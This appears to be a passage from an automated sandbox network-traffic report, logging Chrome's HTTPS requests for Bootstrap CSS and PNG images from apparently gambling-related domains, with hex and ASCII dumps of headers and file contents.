                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 35 37 31 34 33 3b 63 6f 6c 6f 72 3a 23 33 33 33 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 7b 63 6f 6c 6f 72 3a 23 33 33 37 61 62 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 3a 68 6f 76 65 72 2c 61 3a 66 6f 63 75 73
                                                                                                                                                          Data Ascii: :"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.42857143;color:#333;background-color:#fff}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a{color:#337ab7;text-decoration:none}a:hover,a:focus
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 3e 74 68 2e 73 75 63 63 65 73 73 3a 68 6f 76 65 72 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 2e 73 75 63 63 65 73 73 3a 68 6f 76 65 72 3e 74 64 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 3a 68 6f 76 65 72 3e 2e 73 75 63 63 65 73 73 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 3e 74 62 6f 64 79 3e 74 72 2e 73 75 63 63 65 73 73 3a 68 6f 76 65 72 3e 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 30 65 39 63 36 7d 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 3e 74 64 2e 69 6e 66 6f 2c 2e 74 61 62 6c 65 3e 74 62 6f 64 79 3e 74 72 3e 74 64 2e 69 6e 66 6f 2c 2e 74 61 62 6c 65 3e 74 66 6f 6f 74 3e 74 72 3e 74 64 2e 69 6e 66 6f 2c 2e 74 61 62 6c 65 3e 74 68 65
                                                                                                                                                          Data Ascii: -hover>tbody>tr>th.success:hover,.table-hover>tbody>tr.success:hover>td,.table-hover>tbody>tr:hover>.success,.table-hover>tbody>tr.success:hover>th{background-color:#d0e9c6}.table>thead>tr>td.info,.table>tbody>tr>td.info,.table>tfoot>tr>td.info,.table>the
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 6e 2d 73 75 63 63 65 73 73 2e 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 5b 64 69 73 61 62 6c 65 64 5d 3a 68 6f 76 65 72 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 2e 64 69 73 61 62 6c 65 64 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 5b 64 69 73 61 62 6c 65 64 5d 3a 66 6f 63 75 73 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 73 75 63 63 65 73 73 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 2e 64 69 73 61 62 6c 65 64 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 5b 64 69 73 61 62 6c 65 64 5d 2e 66 6f 63 75 73 2c 66 69 65 6c 64 73 65 74 5b 64 69
                                                                                                                                                          Data Ascii: n-success.disabled:hover,.btn-success[disabled]:hover,fieldset[disabled] .btn-success:hover,.btn-success.disabled:focus,.btn-success[disabled]:focus,fieldset[disabled] .btn-success:focus,.btn-success.disabled.focus,.btn-success[disabled].focus,fieldset[di
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 65 72 2d 72 61 64 69 75 73 3a 34 70 78 20 34 70 78 20 30 20 30 7d 2e 6e 61 76 2d 74 61 62 73 2e 6e 61 76 2d 6a 75 73 74 69 66 69 65 64 3e 2e 61 63 74 69 76 65 3e 61 2c 2e 6e 61 76 2d 74 61 62 73 2e 6e 61 76 2d 6a 75 73 74 69 66 69 65 64 3e 2e 61 63 74 69 76 65 3e 61 3a 68 6f 76 65 72 2c 2e 6e 61 76 2d 74 61 62 73 2e 6e 61 76 2d 6a 75 73 74 69 66 69 65 64 3e 2e 61 63 74 69 76 65 3e 61 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 7d 2e 6e 61 76 2d 70 69 6c 6c 73 3e 6c 69 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 6e 61 76 2d 70 69 6c 6c 73 3e 6c 69 3e 61 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 7d 2e 6e 61 76 2d 70 69 6c 6c 73 3e 6c 69 2b 6c 69 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 70 78 7d 2e
                                                                                                                                                          Data Ascii: er-radius:4px 4px 0 0}.nav-tabs.nav-justified>.active>a,.nav-tabs.nav-justified>.active>a:hover,.nav-tabs.nav-justified>.active>a:focus{border-bottom-color:#fff}}.nav-pills>li{float:left}.nav-pills>li>a{border-radius:4px}.nav-pills>li+li{margin-left:2px}.
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 72 69 67 68 74 3a 36 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 36 30 70 78 7d 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 2c 2e 6a 75 6d 62 6f 74 72 6f 6e 20 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 33 70 78 7d 7d 2e 74 68 75 6d 62 6e 61 69 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 35 37 31 34 33 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75
                                                                                                                                                          Data Ascii: right:60px;padding-left:60px}.jumbotron h1,.jumbotron .h1{font-size:63px}}.thumbnail{display:block;padding:4px;margin-bottom:20px;line-height:1.42857143;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:border .2s ease-in-ou
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 66 6f 6f 74 3e 74 72 3e 74 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 7d 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 68 65 61 64 3e 74 72 3e 74 68 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 68 65 61 64 3e 74 72 3e 74 68 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 62 6f 64 79 3e 74 72 3e 74 68 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e
                                                                                                                                                          Data Ascii: .panel>.table-responsive>.table-bordered>tfoot>tr>td:first-child{border-left:0}.panel>.table-bordered>thead>tr>th:last-child,.panel>.table-responsive>.table-bordered>thead>tr>th:last-child,.panel>.table-bordered>tbody>tr>th:last-child,.panel>.table-respon
                                                                                                                                                          2024-06-09 22:41:20 UTC3580INData Raw: 66 74 65 72 2c 2e 6e 61 76 62 61 72 3a 61 66 74 65 72 2c 2e 6e 61 76 62 61 72 2d 68 65 61 64 65 72 3a 61 66 74 65 72 2c 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 3a 61 66 74 65 72 2c 2e 70 61 67 65 72 3a 61 66 74 65 72 2c 2e 70 61 6e 65 6c 2d 62 6f 64 79 3a 61 66 74 65 72 2c 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 63 65 6e 74 65 72 2d 62 6c 6f 63 6b 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 7d 2e 70 75 6c 6c 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 6c 6c 2d 6c 65 66 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e
                                                                                                                                                          Data Ascii: fter,.navbar:after,.navbar-header:after,.navbar-collapse:after,.pager:after,.panel-body:after,.modal-footer:after{clear:both}.center-block{display:block;margin-right:auto;margin-left:auto}.pull-right{float:right!important}.pull-left{float:left!important}.


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          556192.168.2.550327183.61.168.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC388OUTGET /061410/rcenter/common/images/errors/ico-605.png HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC641INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 43162
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-10
                                                                                                                                                          ETag: "633d510e-a89a"
                                                                                                                                                          Date: Thu, 06 Jun 2024 11:51:56 GMT
                                                                                                                                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 11:51:56 GMT
                                                                                                                                                          Age: 298164
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct61:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-CHANGZ-MP-01-10
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-61-01
                                                                                                                                                          X-Cdn-Request-ID: 1f2820e74dac9165747320dc81ff3fcb
                                                                                                                                                          2024-06-09 22:41:20 UTC15743INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 a8 61 49 44 41 54 78 5e ed bd 07 98 25 55 99 37 fe 9e ba b7 bb a7 27 06 26 91 86 61 08 43 ce 41 32 06 14 54 04 25 88 19 e3 9a 5d 03 86 35 ac ae bb 7e fe 75 f7 f3 5b d7 5d 5d 75 45 d7 04 06 4c 28 08 48 50 94 a0 e4 21 0d 93 99 1c 7b a6 f3 bd b7 aa fe ef ef b9 e7 f7 3c e7 39 a7 ab ea 86 66 18 e0 1e 9e 97 53 75 aa 6e 4d 77 d7 fd bd 31 1c 93 a6 a9 3c 9d c3 18 23 9d d1 a1 0e 3d 3d 54 96 ce 78 d6 d0 1f ff f8 c7 a9 c6 98 33 f1 5e 4b a5 d2 e9 96 b9 76 eb f1 11 38 06 b3 c7 dc d5 d5 b5 28 8b 11 d7 6a b5 15 7a 5c e1 7a 92 24 8b f5 73 15 5e d7 e3 3b 75 1a 89 a2 08 9f f9 fd 71 c7 1d 57 95 ce 78 c6 52 47 03 78 86 d1 cd 37 df 7c b2 82 ef 04 05 f5 31 4a 07 94 cb e5 3d
                                                                                                                                                          Data Ascii: PNGIHDR\rfaIDATx^%U7'&aCA2T%]5~u[]]uEL(HP!{<9fSunMw1<#==Tx3^Kv8(jz\z$s^;uqWxRGx7|1J=
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: b8 e5 c7 32 fc a7 df 48 a5 bf 6a 2d fc 58 19 41 02 55 1f 91 13 74 ab f2 cc 00 6a 1f 46 ec 14 84 07 d3 2c 47 80 bb 4e 3f 00 33 21 75 56 34 d5 9d 81 91 ce 89 91 be 75 6b 5c bc 15 32 01 0e cf 11 08 26 70 ac 0d 07 0e 28 c5 4d 33 00 8d fd f7 aa fa df e5 01 da ff d2 e3 38 f7 4b 05 07 a0 30 13 2f 26 b2 ac 2a ee 4a 7d 13 b6 f9 4a b3 9a 7c 92 19 67 74 ee 09 b4 85 b8 26 5b ee fb 1b 1d 7d 79 76 7e 78 8d e7 91 9d 89 30 05 ab a3 0d b5 16 6a b3 3e 00 4a 33 24 02 65 47 00 8a 4d 00 21 23 89 ea 26 40 8c 5a 80 c6 42 76 61 3b 30 62 cd 15 89 25 fe ce 46 da 19 ac de 8b 32 9c 80 bc c9 67 f3 cc 22 15 80 1f 52 bf a7 2c a5 c9 65 75 56 4d 91 ee b3 2f 91 d2 59 6f 12 33 79 46 be 64 db f7 70 e9 be e4 93 b2 75 ea 3e 32 e1 ba ff 86 4f 00 24 a9 92 54 f8 fd a3 ce e0 e1 d9 52 e6 08 4d 80
                                                                                                                                                          Data Ascii: 2Hj-XAUtjF,GN?3!uV4uk\2&p(M38K0/&*J}J|gt&[}yv~x0j>J3$eGM!#&@ZBva;0b%F2g"R,euVM/Yo3yFdpu>2O$TRM
                                                                                                                                                          2024-06-09 22:41:20 UTC11035INData Raw: 00 d8 dd 7a 7e 00 9f 09 3e a0 e1 7a 6a af 2d e9 05 f0 63 d9 39 aa b6 f6 21 47 cb b9 9f fb 37 68 8e 3e 70 1b 12 3a 39 83 0d 3c 10 ee c5 33 e1 f4 c3 e6 1e 8c ff 53 fa d3 e1 0b cd 0e 6b 64 0a 68 b4 73 af e2 65 0d 30 e6 4a ff a7 8f 01 84 5a c0 0e 9b 90 30 47 cb 13 6f 3d f4 d0 43 0f 54 ce d5 eb 39 a6 02 42 0b b1 1f ff f8 c7 f2 da d7 be 96 91 01 de 3b ee 4c e0 d0 97 bc 54 66 ff ee 56 f9 f1 5b 5f 2f 7d 8f 2f 96 44 10 fb 37 60 04 7a 0c 29 65 60 a7 4b 17 70 6a bf b4 d0 0a 22 96 16 db 3d 09 12 c7 39 88 67 47 44 51 18 3d f0 46 d8 b4 84 45 4a 65 a9 3b 25 93 34 a9 7f 81 ab a9 24 60 50 51 22 69 49 d7 8d 92 82 bf 06 e4 44 b0 9b 11 1b de 29 40 d2 34 b3 4e 8c 6d 94 37 cb 90 09 66 a5 f0 82 1c 98 1b e6 c7 07 bd b3 ea 13 8f 01 b2 84 d5 71 75 f1 8a c0 06 c0 6e e2 a4 de a4 55
                                                                                                                                                          Data Ascii: z~>zj-c9!G7h>p:9<3Skdhse0JZ0Go=CT9B;LTfV[_/}/D7`z)e`Kpj"=9gGDQ=FEJe;%4$`PQ"iID)@4Nm7fqunU


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          557192.168.2.55034023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC382OUTGET /pc/image-pc/index/383/login/loginbg.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 9556
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:19 GMT
                                                                                                                                                          ETag: "64bf926b-2554"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE1[2],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464729
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: faf3bc5af36d2c0c35e82f1b49525a59
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127271
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC9556INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 e8 00 00 01 36 08 06 00 00 00 6b ea de 93 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR6ktEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          558192.168.2.55033990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC649OUTGET /pc/image-pc/index/383/menu/nv5.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1729
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-6c1"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE25[3],EU-FRA-paris-GLOBAL1-CACHE22[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467538
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 10bdce72636b57ff94583cd525f20b51
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124462
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1729INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1a 00 00 00 1a 08 06 00 00 00 a9 4a 4c ce 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRJLtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          559192.168.2.55028638.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC656OUTGET /index/getAppsUrl.html?device=android&fPixelId=&accessToken=&apiVersion= HTTP/1.1
                                                                                                                                                          Host: e933002.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: */*
                                                                                                                                                          X-Requested-With: XMLHttpRequest
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: route=181dd5ae39c7acd81ad5ca039c14a954
                                                                                                                                                          2024-06-09 22:41:20 UTC21INHTTP/1.1 605 unknow
                                                                                                                                                          2024-06-09 22:41:20 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:20 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 32 30 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          2024-06-09 22:41:20 UTC60INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 72 6f 75 74 65 3d 62 34 66 64 38 34 34 63 38 30 61 39 37 63 63 63 32 62 30 62 63 31 66 61 61 65 31 61 33 65 34 63 3b 20 50 61 74 68 3d 2f 0d 0a
                                                                                                                                                          Data Ascii: Set-Cookie: route=b4fd844c80a97ccc2b0bc1faae1a3e4c; Path=/
                                                                                                                                                          2024-06-09 22:41:20 UTC19INData Raw: 68 65 61 64 65 72 53 74 61 74 75 73 3a 20 36 30 35 0d 0a
                                                                                                                                                          Data Ascii: headerStatus: 605
                                                                                                                                                          2024-06-09 22:41:20 UTC23INData Raw: 69 70 53 74 72 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                          Data Ascii: ipStr: 173.254.250.91
                                                                                                                                                          2024-06-09 22:41:20 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:41:20 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 63 64 6e 2d 53 74 61 72 6c 69 6e 6b 2d 4b 52 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from cdn-Starlink-KR
                                                                                                                                                          2024-06-09 22:41:20 UTC19INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 0
                                                                                                                                                          2024-06-09 22:41:20 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:20 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          560192.168.2.55034290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC611OUTGET /pc/image-pc/index/312/nav/liveCasino/05.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
